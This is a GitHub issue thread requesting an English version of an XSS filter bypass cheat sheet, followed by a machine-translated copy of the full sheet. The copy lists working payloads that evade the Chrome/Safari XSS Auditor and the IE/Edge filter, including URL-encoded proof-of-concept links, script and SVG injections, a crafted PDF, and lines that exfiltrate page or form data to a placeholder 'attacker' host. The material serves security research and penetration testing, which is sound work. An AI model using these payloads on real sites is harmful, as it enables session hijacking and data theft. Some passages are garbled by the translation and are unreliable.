filterbypass icon indicating copy to clipboard operation
filterbypass copied to clipboard

Published 20 hours ago verified publisher icon masatokinugawa

English version?

Open qazbnm456 opened this issue 7 years ago • 8 comments

Hi @masatokinugawa, thanks for your sharing. It's pretty neat! However, I just want to know do you have any plan offering the English version as well? It would be great if we can have one. 😄

qazbnm456 avatar Sep 14 '17 14:09 qazbnm456

Hi @qazbnm456! I am thinking that I want to provide English version, but I couldn't make time so far :(

Hi @Auxy233! Please feel free to translate my cheatsheet. It's up to you, but if you can send me the English version (via the pull request?), I'll merge it and add proper credit. Thanks!

masatokinugawa avatar Sep 18 '17 12:09 masatokinugawa

Thank you for your consideration and help, @masatokinugawa and @Auxy233. I'm looking forward to it. 😄

qazbnm456 avatar Sep 18 '17 12:09 qazbnm456

@Auxy233 Nice, I can't wait to see it. Really appreciate. 👍

qazbnm456 avatar Sep 20 '17 01:09 qazbnm456

@Auxy233 Sorry for bothering again, but is there any progress I can follow up? Still awaiting your kind work patiently.

qazbnm456 avatar Nov 15 '17 05:11 qazbnm456

Any progress?

jcubic avatar Jan 12 '18 09:01 jcubic

Just use Google Translate for the time being. @masatokinugawa does a good job at describing the conditions and I was easily able to reproduce the bypasses.

EdOverflow avatar Jun 28 '18 15:06 EdOverflow

here is an google translated markdown for yall, who needs it :

This page summarizes XSS Auditor and XSS filter bypass. Content that runs on the latest versions of Chrome/Safari and IE11/Edge is eligible. If you're a vulnerability diagnostician, let us help you convincingly prove that an attack is possible, and if you're a security researcher, help us find more bypasses. What I'm listing is what can be bypassed in common situations. Just because a method isn't listed here doesn't mean it can't be abused in real-world situations. Regardless of whether it can be bypassed or not, it's always a good idea to do some underlying XSS mitigation.

Table of contents

Table of contents

  • Table of contents
  • XSS Auditor
    • What is not blocked
      • XSS happening in string literals
      • XSS established by URL alone (such as when the input value is directly entered in the href part of the a tag)
      • If you have more than one injection point
      • If there is string manipulation
        • If deleted
        • if replaced
      • DOM based XSS other than document.write() the request string
      • XSS in XML pages
      • http(s): create link
      • Tags that can send requests to the outside
      • Arbitrary CSS description
    • Bypass
      • Using the values attribute for SVG animations (Safari only)
      • Using multiple null characters (Safari only)
      • Using comments with --> in script tags (Safari only)
      • Using half-baked base tags (Safari only)
        • Using Flash
        • Using scripts loaded with relative URLs
      • Use of ISO-2022-JP escape sequences
      • Using resources from the same domain
        • Cases with XSS in the path (Chrome only)
        • File Upload Feature
        • Using Flash and flashvars
        • Using ExternalInterface.objectID and ExternalInterface.call() in Flash
        • Using Angular
        • Using Vue.js
        • Using jQuery
        • Using underscore.js
        • Using JSX transformation scripts such as JSXTransformer/babel-standalone
      • Use odd tags when document.write() (Chrome only)
      • Using half-baked form tags (getting information only) (Safari only)
    • Past bypass
  • IE/Edge XSS filter
    • What is not blocked
      • XSS happening in string literals
      • All DOM based XSS
      • XSS with more than one injection point on one page
      • If there is string manipulation
        • If deleted
        • if replaced
      • Tags that can send requests to the outside
    • Bypass
      • Using strings disguised as XML namespaces (Edge only)
      • Using HZ-GB-2312 Escape Sequences
      • Using encoding behavior when navigating
      • Using the Adobe Acrobat Reader plug-in (IE only)
      • Using Content Sniffing for XML (IE only)
      • Using UTF-7 BOM (IE only)
      • Using <?PXML> (IE only)
      • Using referrers
        • Use of link functions within the same domain (including subdomains)
        • Bypass where arbitrary URL can be specified
        • If the state before submission to the vulnerable form can be maintained on the page
        • Using option tags
        • Using an empty iframe
      • Using formaction (getting information only)
      • Use of character-referenced strings in style (style description only)
    • past bypass

XSS Auditor

What is not blocked

In contexts where protection is not provided in the first place, scripts can be executed without special manipulation.

XSS happening in string literals

https://vulnerabledoma.in/bypass/str_literal?q=%22%3Balert(1)//

<script>var q="";alert(1)//"</script>

XSS established by URL alone (such as when the input value is directly entered in the href part of the a tag)

https://vulnerabledoma.in/bypass/link?q=javascript:alert(1)

<a href="javascript:alert(1)">Link</a>

If you have more than one injection point

(Although it appears to be able to screen out a significant number of cases occurring with more than one, previously reported cases ( [#96616](https://bugs.chromium.org/p/chromium/issues/detail?id =96616) #403636 ) is WontFix, so it is classified as not to be blocked.)

https://vulnerabledoma.in/bypass/text?type=2&q=%60-alert(1)%3C/script%3E%3Cscript%3E%60

<div>`-alert(1)</script><script>`</div>
<div>`-alert(1)</script><script>`</div>

If there is string manipulation

When some strings are removed or replaced, intervening strings do not block.

If deleted

https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E

<svg o<script>nload=alert(1)>
???
<svg onload=alert(1)>

if replaced

https://vulnerabledoma.in/bypass/text?type=7&q=%3Cscript%3E/%26/-alert(1)%3C/script%3E

<script>/&/-alert(1)</script>
???
<script>/&amp;/-alert(1)</script>

DOM based XSS other than document.write() the request string

https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E

<body>
<script>
hash=location.hash.slice(1);
document.body.innerHTML=decodeURIComponent(hash);
</script>
</body>

https://vulnerabledoma.in/bypass/dom_redirect#javascript:alert(1)

<script>
location.href=decodeURIComponent(location.hash.slice(1));
</script>

XSS in XML pages

https://vulnerabledoma.in/bypass/xml?q=%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ealert(1)%3C/script%3E

<?xml version="1.0"?><html><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script></html>

Bypass also occurs when a string can be written from the top of the page, Content-Type is not specified correctly, and XML is selected by Content Sniffing.

https://vulnerabledoma.in/bypass/text?mime=unknown&q=%3C?xml%20version=%221.0%22?%3E%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml% 22%3Ealert(1)%3C/script%3E

<?xml version="1.0"?><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>

Anything less than this does not lead to script execution, but is allowed to be written and has the potential to be used for attacks to some extent.

http(s): create link

https://vulnerabledoma.in/bypass/text?q=%3Ca%20href=https://attacker/%3ESession%20expired.%20Please%20login%20again.%3C/a%3E

<a href=https://attacker/>Session expired. Please login again.</a>

Tags that can send requests to the outside

It is sometimes possible to include confidential information in requests such as images, for example by using open quotes.

https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data=

<p><img src="https://attacker/?data=</p>
<p>This is a secret text.</p>
<p id="x">AAA</p>

Arbitrary CSS description

In addition to disguising the appearance of the page, if the same page contains sensitive information, it may be possible to retrieve the information using only CSS. See URL for details.

Reference URL:

  • http://www.businessinfo.co.uk/labs/talk/The_Sexy_Assassin.ppt
  • https://masatokinugawa.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html

https://vulnerabledoma.in/bypass/text?q=%3Cstyle%3E@import%20%27//attacker/test.css%27%3C/style%3E

<style>@import '//attacker/test.css'</style>

https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=stylesheet%20href=//attacker/test.css%3E

<link rel=stylesheet href=//attacker/test.css>

Bypass

Using the values attribute for SVG animations (Safari only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags

Reference URL:

  • https://bugs.chromium.org/p/chromium/issues/detail?id=709365
  • https://bugs.chromium.org/p/chromium/issues/detail?id=738017

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Csvg%20xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Canimate%20xlink:href=%23x%20attributeName=%22xlink :href%22%20values=%22%26%23x3000%3Bjavascript:alert(1)%22%20/%3E%3Ca%20id=x%3E%3Crect%20width=100%20height=100%20/%3E %3C/a%3E

<svg xmlns:xlink=http://www.w3.org/1999/xlink><animate xlink:href=#x attributeName="xlink:href" values="&#x3000;javascript:alert(1)"/ ><a id=x><rect width=100 height=100 /></a>

Using multiple null characters (Safari only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A null byte is printed
  3. No preceding whitespace character

Reference URL:

  • https://twitter.com/0rbz_/status/896896095862669312

PoCs:

https://vulnerabledoma.in/bypass/text?q=%00%00%00%00%00%00%00%3Cscript%3Ealert(1)%3C/script%3E

[0x00][0x00][0x00][0x00][0x00][0x00][0x00]<script>alert(1)</script>

Using comments with --> in script tags (Safari only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is a closing tag of the script tag without a line break after it

Reference URL:

  • https://bugs.chromium.org/p/chromium/issues/detail?id=753307

PoCs:

https://vulnerabledoma.in/bypass/text?type=9&q=%3Cscript%3Ealert(1)%0A--%3E

<div><script>alert(1)
--></div><script src=/test.js></script>

Using half-baked base tags (Safari only)

Using Flash

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is no space immediately after or '" after it
  3. Flash can be used in the target environment

Reference URL:

  • https://masatokinugawa.l0.cm/2016/05/xss8.html

PoCs:

(if there is no space immediately after) https://vulnerabledoma.in/bypass/text?type=3&q=%3Cembed%20allowscriptaccess=always%20src=/xss.swf%3E%3Cbase%20href=//l0.cm /

<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>

(If there is a white space immediately after) https://vulnerabledoma.in/bypass/text?type=4&q=%3Cembed%20allowscriptaccess=always%20src=/xss.swf%3E%3Cbase%20href=%22//l0 .cm/

<div> <embed allowscriptaccess=always src=/xss.swf><base href="//l0.cm/ </div><div id="x"></div>

Using scripts loaded with relative URLs

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is no space immediately after or '" after it
  3. After that, there is a part that loads the script with a relative URL

PoCs:

https://vulnerabledoma.in/bypass/text?type=9&q=%3Cbase%20href=//cors.l0.cm/

<div><base href=//cors.l0.cm/</div><script src=/test.js></script>

Use of ISO-2022-JP escape sequences

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is no character code specification on the page

supplement:

In the ISO-2022-JP HTML, the byte strings [0x1B](B, [0x1B](H, [0x1B](J are ignored. Insert this between the reaction strings Also, in Chrome/Safari, a byte string such as [0x1B]$@[0x0A] is treated the same as [0x0A], but the XSS Auditor cannot interpret it well and bypasses it.

Reference URL:

  • https://bugs.chromium.org/p/chromium/issues/detail?id=114941
  • https://l0.cm/encodings/test3/

PoCs:

  • https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Bnload=alert(1)%3E
  • https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Hnload=alert(1)%3E
  • https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Jnload=alert(1)%3E
<meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(1)>

(*Because the $ sign is arbitrarily encoded and does not work as intended, the redirect is sandwiched by a method that includes a $.)

  • [https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$@%0A%3C/script%3E](https https://tinyurl.com/l9mxds2)
  • [https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$B%0A%3C/script%3E](https https://tinyurl.com/ml23lh9)
  • https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B(I%0A%3C/script%3E
  • [https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$@%0D%3C/script%3E](https https://tinyurl.com/lfks6v6)
<meta charset=iso-2022-jp><script>alert(1)[0x1B]$@[0x0A]</script>

Using resources from the same domain

XSS Auditor does not block loading same-domain resources that do not have queries. Bypassing is possible in some cases if the resources necessary for an attack can be placed in the same domain.

Cases with XSS in the path (Chrome only)

Conditions for attacking:

  1. XSS that can write arbitrary tags is in the path
  2. Doesn't require a query to display the page

PoCs:

https://vulnerabledoma.in/bypass/path/%3Clink%20rel=import%20href=%22%2Fbypass%2Fpath%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E%22%3E

PATH_INFO:/<link rel=import href="/bypass/path/<script>alert(1)</script>">

File Upload Feature

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Hosting user-uploaded files on the same origin

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Cscript%20src=/bypass/usercontent/xss.js%3E%3C/script%3E

<script src=/bypass/usercontent/xss.js></script>

(Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/usercontent/icon.jpg%3E

<link rel=import href=/bypass/usercontent/icon.jpg>

Using Flash and flashvars

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is Flash in the same origin that passes an unescaped parameter string to ExnternalInterface.call()
  3. Flash can be used in the target environment

supplement:

By using the flashvars attribute, you can pass parameters without having to pass Flash parameters directly to the query. (= On the Flash side, even if passing parameters from the URL is restricted as a countermeasure against XSS by opening Flash directly, it can be passed with flashvars.) In addition, `Content-Security-Policy: default-src It can also be used to bypass CSP, such as when there is a CSP like 'self'.

PoCs:

https://vulnerabledoma.in/bypass/text?csp=self&q=%3Cembed%20name=a%20flashvars=%27autoplay=true%26file=%22})%22)-(alert=alert(1)))}catch(e){}//%27%20allowscriptaccess=always%20src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf%3E

<embed name=a flashvars='autoplay=true&file="})\")-(alert=alert(1)))}catch(e){}//' allowscriptaccess=always src=//vulnerabledoma.in/bypass /wp-includes/js/mediaelement/flashmediaelement.swf>

ActionScript:

ExternalInterface.call("setTimeout", ExternalInterface.objectID + '_event' + "('" + eventName + "'," + eventValues + ")", 0);

Using ExternalInterface.objectID and ExternalInterface.call() in Flash

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is Flash in the same origin where ExternalInterface.objectID is passed to ExternalInterface.call()
  3. Flash can be used in the target environment

supplement:

ExternalInterface.objectID is a property that sets the value of the name attribute of the tag used for embedding, and although it cannot be XSSed by itself, it can be used only for bypassing. It can also be used to bypass CSP when there are CSP restrictions such as Content-Security-Policy: default-src 'self'.

PoCs:

https://vulnerabledoma.in/bypass/text?csp=self&q=%3Cembed%20name=%27alert(1)-%27%20allowscriptaccess=always%20src=//vulnerabledoma.in/bypass/wp-includes/js/ mediaelement/flashmediaelement.swf%3E

<embed name='alert(1)-' allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>

ActionScript:

ExternalInterface.call(ExternalInterface.objectID + '_init');

Using Angular

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A page on the same origin that hosts Angular or loads Angular from a CORS-enabled CDN

supplement:

Angular will try to expand the template enclosed in {{}} inside the tag with the attribute ng-app. Templates can run scripts.

Reference URL:

  • https://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Cscript%20src=%22/js/angular1.6.4.min.js%22%3E%3C/script%3E%3Cp%20ng-app%3E{ {constructor.constructor(%27alert(1)%27)()}}

<script src="/js/angular1.6.4.min.js"></script><p ng-app>{{constructor.constructor('alert(1)')()}}

If you have a page on the same origin that loads Angular from a CORS-enabled CDN, you can load resources from external origins by indirectly loading them from HTML Imports.

(Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=angular.html%3E%3Cp%20ng-app%3E{{constructor.constructor(%27alert(1) )%27)()}}

<link rel=import href=angular.html><p ng-app>{{constructor.constructor('alert(1)')()}}

Using Vue.js

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A page on the same origin that hosts Vue.js or loads from a CORS-enabled CDN
  3. There is a script on the page or on the same origin that can execute template expansion for specially crafted tags

PoCs:

(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/vue.html%3E%3Cdiv%20id=app%3E{{constructor. constructor(%27alert(1)%27)()}}

<link rel=import href=/bypass/vue.html><div id=app>{{constructor.constructor('alert(1)')()}}

Using jQuery

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A page on the same origin that hosts jQuery or loads jQuery from a CORS-enabled CDN
  3. There is a script on the page or on the same origin that can execute jQuery additional functions for the crafted form tag

supplement:

jQuery additional functions are after,before,prepend,append,html,replaceWith,wrap,wrapAll,insertBefore,insertAfter,prependTo Things like ,appendTo. By using a form component with a name attribute of ownerDocument, the reference destination of Node.ownerDocument is misleading. , the script is executed when it should not be executed. -scream/21)). In addition, there is a process to remove <!-- in the script block before execution, combined with the fact that Auditor does not intercept script blocks that contain only comments, causes the bypass.

Reference URL:

  • https://sirdarckcat.github.io/csp/jquery.html

PoCs:

https://vulnerabledoma.in/bypass/text?type=5&q=%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!--alert(1)%3C/script% 3E%3C/form%3E

<!DOCTYPE html>
<html>
<head>
<script src="/js/jquery-3.2.1.min.js"></script>
<script>
$(document).ready(function(){
     // code taken from http://api.jquery.com/after/
     $( ".container" ).after( $( ".child" ) );
});
</script>
</head>
<body>
<!-- XSS -->
<form class=child><input name=ownerDocument><script><!--alert(1)</script></form>
<!-- XSS -->
<p class="container"></p>
</body>
<!-- Inspired by @sirdarckcat CSP bypass trick: https://sirdarckcat.github.io/csp/jquery.html -->
</html>

(This example is Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/jquery.html%3E%3Cp%20class=container%3E%3C/p %3E%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!--alert(1)%3C/script%3E%3C/form%3E

<link rel=import href=/bypass/jquery.html><p class=container></p><form class=child><input name=ownerDocument><script><!--alert(1)</script ></form>

Using underscore.js

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A page on the same origin that hosts underscore.js or loads it from a CORS-enabled CDN
  3. There is a script on the page or on the same origin that can execute template expansion for specially crafted script tags

PoCs:

(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/underscore.html%3E%3Cscript%20id=template%3E//%3C %alert1%%3E%3C/script%3E

<link rel=import href=/bypass/underscore.html><script id=template>//<%alert`1`%></script>

Using JSX transformation scripts such as JSXTransformer/babel-standalone

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Pages on the same origin that host JSX transformation scripts such as JSXTransformer.js or load them from a CORS-enabled CDN

supplement:

Take advantage of the conversion script parsing SVG script blocks in the same way as HTML script blocks. The comment part between <!-- and -->, which is not normally executed, is evaluated as a script.

PoCs:

(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?charset=utf-8&type=1&q=%3Clink%20rel=import%20href=/bypass/babel-standalone.html%3E%3Csvg%3E %3Cscript%20type=%22text/jsx%22%3E//%3C!--%0aalert(1)//--%3E%3C/svg%3E%3Cscript%3E0%3C/script%3E

<link rel=import href=/bypass/babel-standalone.html><svg><script type=text/jsx>//<!--
alert(1)//--></svg><script>0</script>

Use odd tags when document.write() (Chrome only)

Conditions for attacking:

  1. There is XSS that document.write() the URL
  2. The tag used for the attack can be closed outside document.write() (in the case of the PoC below, </body> is used as the closing tag)

Reference URL:

  • https://bugs.chromium.org/p/chromium/issues/detail?id=421786

PoCs:

https://vulnerabledoma.in/bypass/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)//

<body>
<script>
hash=location.hash.slice(1);
document.write(decodeURIComponent(hash));
</script>
</body>

Using half-baked form tags (getting information only) (Safari only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. New form tags can be placed where existing form content containing sensitive information can be submitted.

Reference URL:

  • https://bugs.chromium.org/p/chromium/issues/detail?id=719092

PoCs:

(if you are inside a form) https://vulnerabledoma.in/bypass/form?q=%22%3E%3C/form%3E%3Cform%20action=https://attacker/

<form action="form">
<input type="hidden" name="q" value=""></form><form action=https://attacker/">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>

(when outside the form) https://vulnerabledoma.in/bypass/form2?q=%3Cbutton%20form=f%3ECLICK%3Cform%20id=f%20action=https://attacker/

<div><button form=f>CLICK<form id=f action=https://attacker/</div>
<form action="form2">
<input type="hidden" name="secret" value="a09d3ef0">
</form>

past bypass

Posted in Fixed Bypass Archive.

IE/Edge XSS filter

What is not blocked

XSS happening in string literals

supplement:

Previously there was a blocking condition for string literals. Although it still partially remains, assignment to location, which was blocked before, is clearly attackable, etc. is allowed, and there is almost no protection. It doesn't look like it's going to provide protection any more, so I've categorized it as non-blocking rather than bypass.

https://vulnerabledoma.in/bypass/str_literal?q=%22%3Blocation='javascript\x3Aalert\x281\x29'//

<script>var q="";location='javascript\x3Aalert\x281\x29'//"</script>

All DOM based XSS

https://vulnerabledoma.in/bypass/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)%3E

<script>
hash=location.hash.slice(1);
document.write(decodeURIComponent(hash));
</script>

https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E

<body>
<script>
hash=location.hash.slice(1);
document.body.innerHTML=decodeURIComponent(hash);
</script>
</body>

https://vulnerabledoma.in/bypass/dom_redirect#javascript:alert(1)

<script>
location.href=decodeURIComponent(location.hash.slice(1));
</script>

XSS with more than one injection point on one page

https://vulnerabledoma.in/bypass/text?type=2&q=%22src=data:,alert%25281%2529%3E%3C/script%3E%3Cscript%20x=%22

<div>"src=data:,alert%281%29></script><script x="</div>
<div>"src=data:,alert%281%29></script><script x="</div>

If there is string manipulation

When some strings are removed or replaced, intervening strings do not block.

If deleted

https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E

<svg o<script>nload=alert(1)>
???
<svg onload=alert(1)>

if replaced

At the position represented by . in the regular expression of the filter, more than Can no longer be blocked if a replacement is made.

In the following case, to avoid matching the cut-off condition <sc{r}ipt.*?>, the behavior of & being replaced excessively is used. / is a wildcard of 0-3 characters and & is a wildcard of 0-5 characters, so the maximum width that can be cut off is 8 characters. The string length of /&amp;amp; in the output after replacement is 10 characters, which exceeds the width of 8 characters, so it cannot be cut off.

PoCs:

https://vulnerabledoma.in/bypass/text?type=10&q=%3Cscript/%26%3Ealert(1)%3C/script%3E

<script/&>alert(1)</script>
???
<script/&amp;amp;>alert(1)</script>

Anything less than this does not lead to script execution, but is allowed to be written and has the potential to be used for attacks to some extent.

Tags that can send requests to the outside

It is sometimes possible to include confidential information in requests such as images, for example by using open quotes.

https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data=

<p><img src="https://attacker/?data=</p>
<p>This is a secret text.</p>
<p id="x">AAA</p>

Bypass

Using strings disguised as XML namespaces (Edge only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Flash is enabled in the target environment
  3. No X-XSS-Protection:1; mode-block header

supplement:

Edge will also try to block tags with an XML namespace. If a character string such as <embed/:script is used in normal HTML, it will be interpreted as a script tag when it should be interpreted as an embed tag, and blocking will fail. Since the blocking action has happened, the bypass will fail if the X-XSS-Protection:1; mode-block header is present.

Reference URL:

  • https://masatokinugawa.l0.cm/2016/12/xss9.html

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Cembed/:script%20allowscriptaccess=always%20src=//l0.cm/xss.swf%3E

<embed/:script allowscriptaccess=always src=//l0.cm/xss.swf>

Using HZ-GB-2312 Escape Sequences

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Missing character code specification in Content-Type header

Reference URL:

  • https://masatokinugawa.l0.cm/2015/09/xss7.html

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a

<x~
onfocus=alert(1) id=a tabindex=0>

Using encoding behavior when navigating

Conditions for attacking:

  1. Reflected XSS via GET

supplement:

During navigation, IE/Edge encodes the query string with the character code of the page before navigation and sends the request. At this time, the XSS filter was (presumably) checking the encoded string itself, not the request being sent, which could cause a mismatch between the encoded string and the bytes actually sent. Bypass occurs when

A specific example is shown with the character code x-chinese-cns used in the PoC below. In x-chinese-cns the character ??。 is mapped to 0xA13E. At this time, a query <script/??。 containing this string is sent from a page that has x-chinese-cns set as the character code of the page, attached to a parameter with reflective XSS. Then, the request to be sent is not the UTF-8 representation of ??。, but the byte itself encoded in x-chinese-cns </script/0xA1> (0x3E is >). , a <script> tag is written in the page. Normally, if you write a <script> tag, the XSS filter should work, but it doesn't work here. The reason for this is presumed that the filter mistakenly saw the string <script/??。 and did not match the blocking condition <sc{r}ipt.*?>.

Reference URL:

  • https://masatokinugawa.l0.cm/2017/05/xss14.html

PoCs:

  • https://l0.cm/bypass/ie_x-chinese-cns_text.html
<meta charset=utf-8>
<script>
   document.charset="x-chinese-cns";
   location="https://vulnerabledoma.in/bypass/text?q=<script/??。alert(1)<\/script/"
</script>

(For XSS with attribute value only) https://l0.cm/bypass/ie_x-chinese-cns_attribute.html

<meta charset=utf-8>
<script>
   document.charset="x-chinese-cns";
   location="https://vulnerabledoma.in/bypass/attribute?q=?ケ?onmouseover=alert(1)//"
</script>

As with other character codes, a mismatch between the encoded string and the bytes actually sent can be bypassed.

  • https://l0.cm/bypass/ie_hz_text.html
  • https://l0.cm/bypass/ie_hz_attribute.html
  • https://l0.cm/bypass/ie_iso2022jp_text.html
  • https://l0.cm/bypass/ie_iso2022jp_attribute.html

(The following is reproduced in an environment where the system locale is Japanese, but it was not reproduced in an environment with a German language. It seems that the operating principle is slightly different from other vectors, but I do not know the clear principle.For reference published in.)

  • https://l0.cm/bypass/ie_0xff_text.html
  • https://l0.cm/bypass/ie_0xff_attribute.html

Using the Adobe Acrobat Reader plug-in (IE only)

Conditions for attacking:

  1. There is XSS via POST request
  2. Target uses Adobe Acrobat Reader plugin

Reference URL:

  • https://insert-script.blogspot.com/2017/01/complete-internet-explorer-xss-filter.html

PoCs:

https://l0.cm/bypass/ie_postxss_bypass.pdf

%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 20R
/Pages 3 0R
/Open Action 33 0 R
/AcroForm 220R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Annot [230R]
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources <<
/ProcSet [/PDF /Text]
/Font << /F1 6 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 56 >>
streams
BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET
endstream
endobj
6 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj

33 0 obj
<<
/S /SubmitForm
/F
         <<
         %URL TO SUBMIT TO:
         /F (https://vulnerabledoma.in/bypass/text)
         /FS /URL
         >>
% SPECIFIES THE FORMAT AND OTHER FORM RELATED CONFIGURATION
/Flags 6
>>
endobj

22 0 obj
<<
     /Fields[23 0R]
>>
endobj
23 0 obj
<<
     /DA (/Helv 12 Tf 0g)
     /F4
     /FT /Tx
     /Rect [ 9.526760 680.078003 297.527008 702.078003 ]
     /Subtype /Widget
     /Type /Annot
     % PARAMETER NAME
     /T (q)
     % PARAMETER PAYLOAD
     /V (<script>alert\(1\)</script>)
     /P40R
>>
endobj
trailer
<<
/Root 1 0 R
>>

Using Content Sniffing for XML (IE only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Missing X-Content-Type-Options:nosniff
  3. String from top of page

Reference URL:

  • https://twitter.com/0x6D6172696F/status/753647521050849280

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3C?xml%20version=%221.0%22?%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/ xhtml%22%3Ealert%281%26%23x29%3B%3C/x:script%3E

<?xml version="1.0"?><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1&#x29;</x:script>

Using UTF-7 BOM (IE only)

Conditions for attacking:

  1. Character strings can be written from the top of the page
  2. Symbols such as +, /, and - are allowed

supplement:

+/v8, +/v9, +/v+, +/v/ are UTF-7 [BOM](https://ja.wikipedia.org/wiki/%E3%83% 90%E3%82%A4%E3%83%88%E3%82%AA%E3%83%BC%E3%83%80%E3%83%BC%E3%83%9E%E3%83%BC% E3%82%AF). In IE, if this string appears at the top of the page, the character code of the page is assumed to be UTF-7. Even if the character code is specified in the page, if the page is reopened via history.back(), the character code of that page will be treated as UTF-7. (Although the latter behavior was reported to Microsoft in July 2013, no changes have been made to date.)

PoCs:

(If there is no character code specified on the page) https://vulnerabledoma.in/bypass/text?q=%2B/v8-%2BADw-script%2BAD4-alert(1)%2BADw-/script%2BAD4-

+/v8-+ADw-script+AD4-alert(1)+ADw-/script+AD4-

(If the page has character code specification) https://l0.cm/bypass/ie_utf7.html

<script>
function go(){
   window.open("https://vulnerabledoma.in/bypass/text?q=%2B/v8-%2BADw-script%2BAD4-alert(location)%2BADw-/script%2BAD4-&charset=utf-8", "a");
   setTimeout(function(){window.open("https://l0.cm/h_back.html","a")},1000);
}
</script>
<button onclick=go()>go</button>

Using <?PXML> (IE only)

Conditions for attacking:

  1. Reflected XSS
  2. Three or more < do not appear before the injection point
  3. The document mode of the page is set to 9 or less, or you can set the document mode to 9 or less by embedding in a frame, etc.

Reference URL:

  • https://masatokinugawa.l0.cm/2017/05/xss13.html

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3C?PXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9

<?PXML><html:script>alert(1)</html:script>

https://vulnerabledoma.in/bypass/text?q=%3CPXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9

<PXML><html:script>alert(1)</html:script>

Using referrers

IE/Edge's XSS filter does not work in cases with a Referer header from the same domain (including subdomains) or localhost. Bypassing is possible if such a referrer can be attached.

